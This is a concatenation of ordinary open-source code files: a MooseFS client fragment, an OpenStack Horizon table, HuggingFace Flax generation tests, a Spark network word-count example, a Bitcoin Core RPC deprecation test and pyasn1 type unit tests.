return StatInfo(*unpack("QQQQI", ans))
# def access(self, inode, modemask):
# return self.sendAndReceive(CUTOMA_FUSE_ACCESS, inode,
# self.uid, self.gid, uint8(modemask))
#
def lookup(self, parent, name):
if ENABLE_DCACHE:
cache = self.dcache.get(parent)
if cache is None and self.dstat.get(parent, 0) > 1:
cache = self.getdirplus(parent)
if cache is not None:
return cache.get(name), None
self.dstat[parent] = self.dstat.get(parent, 0) + 1
ans = self.sendAndReceive(CUTOMA_FUSE_LOOKUP, parent,
uint8(len(name)), name, 0, 0)
if len(ans) == 1:
return None, ""
if len(ans) != 39:
raise Exception("bad length")
inode, = unpack("I", ans)
return attrToFileInfo(inode, ans[4:]), None
def getattr(self, inode):
ans = self.sendAndReceive(CUTOMA_FUSE_GETATTR, inode,
self.uid, self.gid)
return attrToFileInfo(inode, ans)
def readlink(self, inode):
ans = self.sendAndReceive(CUTOMA_FUSE_READLINK, inode)
length, = unpack("I", ans)
if length+4 != len(ans):
raise Exception("invalid length")
return ans[4:-1]
def getdir(self, inode):
"return: {name: (inode,type)}"
ans = self.sendAndReceive(CUTOMA_FUSE_GETDIR, inode,
self.uid, self.gid)
p = 0
names = {}
while p < len(ans):
length, = unpack("B", ans[p:p+1])
p += 1
if length + p + 5 > len(ans):
break
name = ans[p:p+length]
p += length
inode, type = unpack("IB", ans)
names[name] = (inode, type)
p += 5
return names
def getdirplus(self, inode):
"return {name: FileInfo()}"
if ENABLE_DCACHE:
infos = self.dcache.get(inode)
if infos is not None:
return infos
flag = GETDIR_FLAG_WITHATTR
if ENABLE_DCACHE:
flag |= GETDIR_FLAG_DIRCACHE
ans = self.sendAndReceive(CUTOMA_FUSE_GETDIR, inode,
self.uid, self.gid, uint8(flag))
p = 0
infos = {}
while p < len(ans):
length, = unpack("B", ans[p:p+1])
p += 1
name = ans[p:p+length]
p += length
i, = unpack("I", ans[p:p+4])
attr = ans[p+4:p+39]
infos[name] = attrToFileInfo(i, attr, name)
p += 39
if ENABLE_DCACHE:
self.dcache[inode] = infos
return infos
def opencheck(self, inode, flag=1):
ans = self.sendAndReceive(CUTOMA_FUSE_OPEN, inode,
self.uid, self.gid, uint8(flag))
return ans
def readchunk(self, inode, index):
ans = self.sendAndReceive(CUTOMA_FUSE_READ_CHUNK, inode, index)
n = len(ans)
if n < 20 or (n-20)%6 != 0:
raise Exception("read chunk: invalid length: %s" % n)
length, id, version = unpack("QQI", ans)
return Chunk(id, length, version, ans[20:])
def test():
m = MasterConn("mfsmaster")
m.connect()
m.close()
#print m.get_attr(1)
while True:
print m.getdir(1)
print m.getdirplus(1)
time.sleep(60)
info, err = m.lookup(1, "test.csv")
print info, err
#print m.opencheck(info.inode)
chunks = m.readchunk(info.inode, 0)
print chunks, chunks.addrs
for i in range(1000):
info, err = m.lookup(1, "test.csv")
chunks = m.readchunk(info.inode, 0)
print i,err, chunks
time.sleep(10)
m.close()
if __name__ == '__main__':
test()
| bsd-3-clause |
mrunge/horizon | openstack_dashboard/dashboards/admin/hypervisors/compute/tables.py | 8 | 2749 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.template import defaultfilters as filters
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import tables
from horizon.utils import filters as utils_filters
from openstack_dashboard import api
class EvacuateHost(tables.LinkAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Evacuate Host",
u"Evacuate Hosts",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Evacuated Host",
u"Evacuated Hosts",
count
)
name = "evacuate"
verbose_name = _("Evacuate Host")
url = "horizon:admin:hypervisors:compute:evacuate_host"
classes = ("ajax-modal", "btn-migrate")
policy_rules = (("compute", "compute_extension:evacuate"),)
def __init__(self, **kwargs):
super(EvacuateHost, self).__init__(**kwargs)
self.name = kwargs.get('name', self.name)
def allowed(self, request, instance):
if not api.nova.extension_supported('AdminActions', request):
return False
return self.datum.state == "down"
class ComputeHostFilterAction(tables.FilterAction):
def filter(self, table, services, filter_string):
q = filter_string.lower()
return filter(lambda service: q in service.type.lower(), services)
class ComputeHostTable(tables.DataTable):
host = tables.Column('host', verbose_name=_('Host'))
zone = tables.Column('zone', verbose_name=_('Zone'))
status = tables.Column('status', verbose_name=_('Status'))
state = tables.Column('state', verbose_name=_('State'))
updated_at = tables.Column('updated_at',
verbose_name=_('Updated At'),
filters=(utils_filters.parse_isotime,
filters.timesince))
def get_object_id(self, obj):
return obj.host
class Meta:
name = "compute_host"
verbose_name = _("Compute Host")
table_actions = (ComputeHostFilterAction,)
multi_select = False
row_actions = (EvacuateHost,)
| apache-2.0 |
huggingface/transformers | tests/test_generation_flax_utils.py | 1 | 9361 | # Copyright 2021 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import numpy as np
from transformers import is_flax_available
from transformers.testing_utils import require_flax
if is_flax_available():
import os
import jax
import jax.numpy as jnp
from jax import jit
os.environ["XLA_PYTHON_CLIENT_MEM_FRACTION"] = "0.12" # assumed parallelism: 8
def ids_tensor(shape, vocab_size, rng=None):
"""Creates a random int32 tensor of the shape within the vocab size."""
if rng is None:
rng = random.Random()
total_dims = 1
for dim in shape:
total_dims *= dim
values = []
for _ in range(total_dims):
values.append(rng.randint(0, vocab_size - 1))
output = np.array(values, dtype=jnp.int32).reshape(shape)
return output
def random_attention_mask(shape, rng=None):
attn_mask = ids_tensor(shape, vocab_size=2, rng=rng)
# make sure that at least one token is attended to for each batch
attn_mask[:, -1] = 1
return attn_mask
@require_flax
class FlaxGenerationTesterMixin:
model_tester = None
all_generative_model_classes = ()
def _get_input_ids_and_config(self):
config, inputs = self.model_tester.prepare_config_and_inputs_for_common()
# cut to half length & take max batch_size 3
max_batch_size = 2
sequence_length = inputs["input_ids"].shape[-1] // 2
input_ids = inputs["input_ids"][:max_batch_size, :sequence_length]
attention_mask = jnp.ones_like(input_ids)
attention_mask = attention_mask[:max_batch_size, :sequence_length]
# generate max 5 tokens
max_length = input_ids.shape[-1] + 5
if config.eos_token_id is not None and config.pad_token_id is None:
# hack to allow generate for models such as GPT2 as is done in `generate()`
config.pad_token_id = config.eos_token_id
return config, input_ids, attention_mask, max_length
def test_greedy_generate(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = False
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_sample_generate(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = True
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_beam_search_generate(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = False
config.max_length = max_length
config.num_beams = 2
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_sample_generate_logits_warper(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.do_sample = True
config.max_length = max_length
config.temperature = 0.8
config.top_k = 10
config.top_p = 0.3
config.min_length = 1
config.forced_bos_token_id = 8
config.forced_eos_token_id = 9
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_greedy_generate_logits_warper(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.max_length = max_length
config.min_length = 1
config.forced_bos_token_id = 8
config.forced_eos_token_id = 9
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_beam_search_generate_logits_warper(self):
config, input_ids, _, max_length = self._get_input_ids_and_config()
config.max_length = max_length
config.num_beams = 2
config.min_length = 1
config.forced_bos_token_id = 8
config.forced_eos_token_id = 9
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_greedy_generate_attn_mask(self):
config, input_ids, attention_mask, max_length = self._get_input_ids_and_config()
# pad attention mask on the left
attention_mask = jax.ops.index_update(attention_mask, (0, 0), 0)
config.do_sample = False
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids, attention_mask=attention_mask).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids, attention_mask=attention_mask).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_sample_generate_attn_mask(self):
config, input_ids, attention_mask, max_length = self._get_input_ids_and_config()
# pad attention mask on the left
attention_mask = jax.ops.index_update(attention_mask, (0, 0), 0)
config.do_sample = True
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids, attention_mask=attention_mask).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids, attention_mask=attention_mask).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
def test_beam_search_generate_attn_mask(self):
config, input_ids, attention_mask, max_length = self._get_input_ids_and_config()
# pad attention mask on the left
attention_mask = jax.ops.index_update(attention_mask, (0, 0), 0)
config.num_beams = 2
config.max_length = max_length
for model_class in self.all_generative_model_classes:
model = model_class(config)
generation_outputs = model.generate(input_ids, attention_mask=attention_mask).sequences
self.assertEqual(generation_outputs.shape[-1], max_length)
jit_generate = jit(model.generate)
jit_generation_outputs = jit_generate(input_ids, attention_mask=attention_mask).sequences
self.assertListEqual(generation_outputs.tolist(), jit_generation_outputs.tolist())
| apache-2.0 |
maropu/spark | examples/src/main/python/sql/streaming/structured_network_wordcount.py | 27 | 2500 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
r"""
Counts words in UTF8 encoded, '\n' delimited text received from the network.
Usage: structured_network_wordcount.py <hostname> <port>
<hostname> and <port> describe the TCP server that Structured Streaming
would connect to receive data.
To run this on your local machine, you need to first run a Netcat server
`$ nc -lk 9999`
and then run the example
`$ bin/spark-submit examples/src/main/python/sql/streaming/structured_network_wordcount.py
localhost 9999`
"""
import sys
from pyspark.sql import SparkSession
from pyspark.sql.functions import explode
from pyspark.sql.functions import split
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: structured_network_wordcount.py <hostname> <port>", file=sys.stderr)
sys.exit(-1)
host = sys.argv[1]
port = int(sys.argv[2])
spark = SparkSession\
.builder\
.appName("StructuredNetworkWordCount")\
.getOrCreate()
# Create DataFrame representing the stream of input lines from connection to host:port
lines = spark\
.readStream\
.format('socket')\
.option('host', host)\
.option('port', port)\
.load()
# Split the lines into words
words = lines.select(
# explode turns each item in an array into a separate row
explode(
split(lines.value, ' ')
).alias('word')
)
# Generate running word count
wordCounts = words.groupBy('word').count()
# Start running the query that prints the running counts to the console
query = wordCounts\
.writeStream\
.outputMode('complete')\
.format('console')\
.start()
query.awaitTermination()
| apache-2.0 |
jonasschnelli/bitcoin | test/functional/rpc_deprecated.py | 6 | 3063 | #!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_raises_rpc_error, find_vout_for_address
class DeprecatedRpcTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [[], ['-deprecatedrpc=bumpfee']]
def run_test(self):
# This test should be used to verify correct behaviour of deprecated
# RPC methods with and without the -deprecatedrpc flags. For example:
#
# In set_test_params:
# self.extra_args = [[], ["-deprecatedrpc=generate"]]
#
# In run_test:
# self.log.info("Test generate RPC")
# assert_raises_rpc_error(-32, 'The wallet generate rpc method is deprecated', self.nodes[0].rpc.generate, 1)
# self.nodes[1].generate(1)
if self.is_wallet_compiled():
self.log.info("Test bumpfee RPC")
self.nodes[0].generate(101)
self.nodes[0].createwallet(wallet_name='nopriv', disable_private_keys=True)
noprivs0 = self.nodes[0].get_wallet_rpc('nopriv')
w0 = self.nodes[0].get_wallet_rpc(self.default_wallet_name)
self.nodes[1].createwallet(wallet_name='nopriv', disable_private_keys=True)
noprivs1 = self.nodes[1].get_wallet_rpc('nopriv')
address = w0.getnewaddress()
desc = w0.getaddressinfo(address)['desc']
change_addr = w0.getrawchangeaddress()
change_desc = w0.getaddressinfo(change_addr)['desc']
txid = w0.sendtoaddress(address=address, amount=10)
vout = find_vout_for_address(w0, txid, address)
self.nodes[0].generate(1)
rawtx = w0.createrawtransaction([{'txid': txid, 'vout': vout}], {w0.getnewaddress(): 5}, 0, True)
rawtx = w0.fundrawtransaction(rawtx, {'changeAddress': change_addr})
signed_tx = w0.signrawtransactionwithwallet(rawtx['hex'])['hex']
noprivs0.importmulti([{'desc': desc, 'timestamp': 0}, {'desc': change_desc, 'timestamp': 0, 'internal': True}])
noprivs1.importmulti([{'desc': desc, 'timestamp': 0}, {'desc': change_desc, 'timestamp': 0, 'internal': True}])
txid = w0.sendrawtransaction(signed_tx)
self.sync_all()
assert_raises_rpc_error(-32, 'Using bumpfee with wallets that have private keys disabled is deprecated. Use psbtbumpfee instead or restart bitcoind with -deprecatedrpc=bumpfee. This functionality will be removed in 0.22', noprivs0.bumpfee, txid)
bumped_psbt = noprivs1.bumpfee(txid)
assert 'psbt' in bumped_psbt
else:
self.log.info("No tested deprecated RPC methods")
if __name__ == '__main__':
DeprecatedRpcTest().main()
| mit |
pexip/os-pyasn1 | tests/type/test_univ.py | 6 | 62254 | #
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <[email protected]>
# License: http://snmplabs.com/pyasn1/license.html
#
import math
import pickle
import sys
try:
import unittest2 as unittest
except ImportError:
import unittest
from tests.base import BaseTestCase
from pyasn1.type import univ
from pyasn1.type import tag
from pyasn1.type import constraint
from pyasn1.type import namedtype
from pyasn1.type import namedval
from pyasn1.type import error
from pyasn1.compat.octets import str2octs, ints2octs, octs2ints
from pyasn1.error import PyAsn1Error
class NoValueTestCase(BaseTestCase):
def testSingleton(self):
assert univ.NoValue() is univ.NoValue(), 'NoValue is not a singleton'
def testRepr(self):
try:
repr(univ.noValue)
except PyAsn1Error:
assert False, 'repr() on NoValue object fails'
def testIsInstance(self):
try:
assert isinstance(univ.noValue, univ.NoValue), 'isinstance() on NoValue() object fails'
except PyAsn1Error:
assert False, 'isinstance() on NoValue object fails'
def testStr(self):
try:
str(univ.noValue)
except PyAsn1Error:
pass
else:
assert False, 'str() works for NoValue object'
def testLen(self):
try:
len(univ.noValue)
except PyAsn1Error:
pass
else:
assert False, 'len() works for NoValue object'
def testCmp(self):
try:
univ.noValue == 1
except PyAsn1Error:
pass
else:
assert False, 'comparison works for NoValue object'
def testSubs(self):
try:
univ.noValue[0]
except PyAsn1Error:
pass
else:
assert False, '__getitem__() works for NoValue object'
def testKey(self):
try:
univ.noValue['key']
except PyAsn1Error:
pass
else:
assert False, '__getitem__() works for NoValue object'
def testKeyAssignment(self):
try:
univ.noValue['key'] = 123
except PyAsn1Error:
pass
else:
assert False, '__setitem__() works for NoValue object'
def testInt(self):
try:
int(univ.noValue)
except PyAsn1Error:
pass
else:
assert False, 'integer conversion works for NoValue object'
def testAdd(self):
try:
univ.noValue + univ.noValue
except PyAsn1Error:
pass
else:
assert False, 'addition works for NoValue object'
def testBitShift(self):
try:
univ.noValue << 1
except PyAsn1Error:
pass
else:
assert False, 'bitshift works for NoValue object'
def testBooleanEvaluation(self):
try:
if univ.noValue:
pass
except PyAsn1Error:
pass
else:
assert False, 'boolean evaluation works for NoValue object'
def testSizeOf(self):
try:
if hasattr(sys, 'getsizeof'):
sys.getsizeof(univ.noValue)
except PyAsn1Error:
assert False, 'sizeof failed for NoValue object'
class IntegerTestCase(BaseTestCase):
def testStr(self):
assert str(univ.Integer(1)) in ('1', '1L'), 'str() fails'
def testRepr(self):
assert '123' in repr(univ.Integer(123))
def testAnd(self):
assert univ.Integer(1) & 0 == 0, '__and__() fails'
def testOr(self):
assert univ.Integer(1) | 0 == 1, '__or__() fails'
def testXor(self):
assert univ.Integer(1) ^ 0 == 1, '__xor__() fails'
def testRand(self):
assert 0 & univ.Integer(1) == 0, '__rand__() fails'
def testRor(self):
assert 0 | univ.Integer(1) == 1, '__ror__() fails'
def testRxor(self):
assert 0 ^ univ.Integer(1) == 1, '__rxor__() fails'
def testAdd(self):
assert univ.Integer(-4) + 6 == 2, '__add__() fails'
def testRadd(self):
assert 4 + univ.Integer(5) == 9, '__radd__() fails'
def testSub(self):
assert univ.Integer(3) - 6 == -3, '__sub__() fails'
def testRsub(self):
assert 6 - univ.Integer(3) == 3, '__rsub__() fails'
def testMul(self):
assert univ.Integer(3) * -3 == -9, '__mul__() fails'
def testRmul(self):
assert 2 * univ.Integer(3) == 6, '__rmul__() fails'
def testDivInt(self):
assert univ.Integer(4) / 2 == 2, '__div__() fails'
if sys.version_info[0] > 2:
def testDivFloat(self):
assert univ.Integer(3) / 2 == 1.5, '__div__() fails'
def testRdivFloat(self):
assert 3 / univ.Integer(2) == 1.5, '__rdiv__() fails'
else:
def testDivFloat(self):
assert univ.Integer(3) / 2 == 1, '__div__() fails'
def testRdivFloat(self):
assert 3 / univ.Integer(2) == 1, '__rdiv__() fails'
def testRdivInt(self):
assert 6 / univ.Integer(3) == 2, '__rdiv__() fails'
if sys.version_info[0] > 2:
def testTrueDiv(self):
assert univ.Integer(3) / univ.Integer(2) == 1.5, '__truediv__() fails'
def testFloorDiv(self):
assert univ.Integer(3) // univ.Integer(2) == 1, '__floordiv__() fails'
def testMod(self):
assert univ.Integer(3) % 2 == 1, '__mod__() fails'
def testRmod(self):
assert 4 % univ.Integer(3) == 1, '__rmod__() fails'
def testPow(self):
assert univ.Integer(3) ** 2 == 9, '__pow__() fails'
def testRpow(self):
assert 2 ** univ.Integer(2) == 4, '__rpow__() fails'
def testLshift(self):
assert univ.Integer(1) << 1 == 2, '<< fails'
def testRshift(self):
assert univ.Integer(2) >> 1 == 1, '>> fails'
def testInt(self):
assert int(univ.Integer(3)) == 3, '__int__() fails'
def testLong(self):
assert int(univ.Integer(8)) == 8, '__long__() fails'
def testFloat(self):
assert float(univ.Integer(4)) == 4.0, '__float__() fails'
def testPos(self):
assert +univ.Integer(1) == 1, '__pos__() fails'
def testNeg(self):
assert -univ.Integer(1) == -1, '__neg__() fails'
def testInvert(self):
assert ~univ.Integer(1) == -2, '__invert__() fails'
def testRound(self):
assert round(univ.Integer(1), 3) == 1.0, '__round__() fails'
def testFloor(self):
assert math.floor(univ.Integer(1)) == 1, '__floor__() fails'
def testCeil(self):
assert math.ceil(univ.Integer(1)) == 1, '__ceil__() fails'
if sys.version_info[0:2] > (2, 5):
def testTrunc(self):
assert math.trunc(univ.Integer(1)) == 1, '__trunc__() fails'
def testPrettyIn(self):
assert univ.Integer('3') == 3, 'prettyIn() fails'
def testTag(self):
assert univ.Integer().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x02)
)
def testNamedVals(self):
class Integer(univ.Integer):
namedValues = univ.Integer.namedValues.clone(('asn1', 1))
assert Integer('asn1') == 1, 'named val fails'
assert int(Integer('asn1')) == 1, 'named val fails'
assert str(Integer('asn1')) == 'asn1', 'named val __str__() fails'
def testSubtype(self):
assert univ.Integer().subtype(
value=1,
implicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 2),
subtypeSpec=constraint.SingleValueConstraint(1, 3)
) == univ.Integer(
value=1,
tagSet=tag.TagSet(tag.Tag(tag.tagClassPrivate,
tag.tagFormatSimple, 2)),
subtypeSpec=constraint.ConstraintsIntersection(constraint.SingleValueConstraint(1, 3))
)
class IntegerPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Integer()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Integer
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Integer(-123)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == -123
class BooleanTestCase(BaseTestCase):
def testTruth(self):
assert univ.Boolean(True) and univ.Boolean(1), 'Truth initializer fails'
def testFalse(self):
assert not univ.Boolean(False) and not univ.Boolean(0), 'False initializer fails'
def testStr(self):
assert str(univ.Boolean(1)) == 'True', 'str() fails'
def testInt(self):
assert int(univ.Boolean(1)) == 1, 'int() fails'
def testRepr(self):
assert 'Boolean' in repr(univ.Boolean(1))
def testTag(self):
assert univ.Boolean().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x01)
)
def testConstraints(self):
class Boolean(univ.Boolean):
pass
try:
Boolean(2)
except error.ValueConstraintError:
pass
else:
assert 0, 'constraint fail'
class BooleanPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Boolean()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Boolean
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Boolean(True)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == True
class BitStringTestCase(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.b = univ.BitString(
namedValues=namedval.NamedValues(('Active', 0), ('Urgent', 1))
)
def testBinDefault(self):
class BinDefault(univ.BitString):
defaultBinValue = '1010100110001010'
assert BinDefault() == univ.BitString(binValue='1010100110001010')
def testHexDefault(self):
class HexDefault(univ.BitString):
defaultHexValue = 'A98A'
assert HexDefault() == univ.BitString(hexValue='A98A')
def testSet(self):
assert self.b.clone('Active') == (1,)
assert self.b.clone('Urgent') == (0, 1)
assert self.b.clone('Urgent, Active') == (1, 1)
assert self.b.clone("'1010100110001010'B") == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone("'A98A'H") == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone(binValue='1010100110001010') == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone(hexValue='A98A') == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone('1010100110001010') == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone((1, 0, 1)) == (1, 0, 1)
def testStr(self):
assert str(self.b.clone('Urgent')) == '01'
def testRepr(self):
assert 'BitString' in repr(self.b.clone('Urgent,Active'))
def testTag(self):
assert univ.BitString().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x03)
)
def testLen(self):
assert len(self.b.clone("'A98A'H")) == 16
def testGetItem(self):
assert self.b.clone("'A98A'H")[0] == 1
assert self.b.clone("'A98A'H")[1] == 0
assert self.b.clone("'A98A'H")[2] == 1
if sys.version_info[:2] > (2, 4):
def testReverse(self):
assert list(reversed(univ.BitString([0, 0, 1]))) == list(univ.BitString([1, 0, 0]))
def testAsOctets(self):
assert self.b.clone(hexValue='A98A').asOctets() == ints2octs((0xa9, 0x8a)), 'testAsOctets() fails'
def testAsInts(self):
assert self.b.clone(hexValue='A98A').asNumbers() == (0xa9, 0x8a), 'testAsNumbers() fails'
def testMultipleOfEightPadding(self):
assert self.b.clone((1, 0, 1)).asNumbers() == (5,)
def testAsInteger(self):
assert self.b.clone('11000000011001').asInteger() == 12313
assert self.b.clone('1100110011011111').asInteger() == 52447
def testStaticDef(self):
class BitString(univ.BitString):
pass
assert BitString('11000000011001').asInteger() == 12313
class BitStringPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.BitString()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.BitString
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.BitString((1, 0, 1, 0))
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == (1, 0, 1, 0)
class OctetStringWithUnicodeMixIn(object):
initializer = ()
encoding = 'us-ascii'
def setUp(self):
self.pythonString = ints2octs(self.initializer).decode(self.encoding)
self.encodedPythonString = self.pythonString.encode(self.encoding)
self.numbersString = tuple(octs2ints(self.encodedPythonString))
def testInit(self):
assert univ.OctetString(self.encodedPythonString) == self.encodedPythonString, '__init__() fails'
def testInitFromAsn1(self):
assert univ.OctetString(univ.OctetString(self.encodedPythonString)) == self.encodedPythonString
assert univ.OctetString(univ.Integer(123)) == univ.OctetString('123')
def testSerialised(self):
if sys.version_info[0] < 3:
assert str(univ.OctetString(self.encodedPythonString, encoding=self.encoding)) == self.encodedPythonString, '__str__() fails'
else:
assert bytes(univ.OctetString(self.encodedPythonString, encoding=self.encoding)) == self.encodedPythonString, '__str__() fails'
def testPrintable(self):
if sys.version_info[0] < 3:
assert str(univ.OctetString(self.encodedPythonString, encoding=self.encoding)) == self.encodedPythonString, '__str__() fails'
assert unicode(univ.OctetString(self.pythonString, encoding=self.encoding)) == self.pythonString, 'unicode init fails'
else:
assert str(univ.OctetString(self.pythonString, encoding=self.encoding)) == self.pythonString, 'unicode init fails'
def testSeq(self):
assert univ.OctetString(self.encodedPythonString)[0] == self.encodedPythonString[0], '__getitem__() fails'
def testRepr(self):
assert 'abc' in repr(univ.OctetString('abc'))
def testAsOctets(self):
assert univ.OctetString(self.encodedPythonString).asOctets() == self.encodedPythonString, 'testAsOctets() fails'
def testAsInts(self):
assert univ.OctetString(self.encodedPythonString).asNumbers() == self.numbersString, 'testAsNumbers() fails'
def testAdd(self):
assert univ.OctetString(self.encodedPythonString) + self.encodedPythonString == self.encodedPythonString + self.encodedPythonString, '__add__() fails'
def testRadd(self):
assert self.encodedPythonString + univ.OctetString(self.encodedPythonString) == self.encodedPythonString + self.encodedPythonString, '__radd__() fails'
def testMul(self):
assert univ.OctetString(self.encodedPythonString) * 2 == self.encodedPythonString * 2, '__mul__() fails'
def testRmul(self):
assert 2 * univ.OctetString(self.encodedPythonString) == 2 * self.encodedPythonString, '__rmul__() fails'
def testContains(self):
s = univ.OctetString(self.encodedPythonString)
assert self.encodedPythonString in s
assert self.encodedPythonString * 2 not in s
if sys.version_info[:2] > (2, 4):
def testReverse(self):
assert list(reversed(univ.OctetString(self.encodedPythonString))) == list(reversed(self.encodedPythonString))
class OctetStringWithAsciiTestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (97, 102)
encoding = 'us-ascii'
class OctetStringWithUtf8TestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (208, 176, 208, 177, 208, 178)
encoding = 'utf-8'
class OctetStringWithUtf16TestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (4, 48, 4, 49, 4, 50)
encoding = 'utf-16-be'
if sys.version_info[0] > 2:
# Somehow comparison of UTF-32 encoded strings does not work in Py2
class OctetStringWithUtf32TestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (0, 0, 4, 48, 0, 0, 4, 49, 0, 0, 4, 50)
encoding = 'utf-32-be'
